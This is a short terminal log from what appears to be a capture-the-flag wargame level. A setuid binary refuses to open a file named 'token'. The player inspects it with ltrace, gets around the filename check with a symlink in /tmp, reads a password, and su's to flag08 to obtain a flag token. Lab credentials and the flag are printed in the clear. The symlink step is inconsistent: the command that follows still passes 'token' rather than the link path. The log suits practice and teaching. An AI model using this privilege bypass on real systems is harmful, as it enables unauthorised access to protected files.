> ls
level08  token

> ./level08 token
You may not access 'token'

> ltrace ./level08 token
__libc_start_main(0x8048554, 2, 0xbffff7e4, 0x80486b0, 0x8048720 <unfinished ...>
strstr("token", "token")                                                  = "token"
printf("You may not access '%s'\n", "token"You may not access 'token'
)                              = 27
exit(1 <unfinished ...>
+++ exited (status 1) +++

> ln -s ~/token /tmp/test

> ./level08 token
quif5eloekouj29ke0vouxean

> su flag08 (last one is the password)
Check flag.Here is your token : 25749xKZ8L7DkSCwJkT9dyv6f
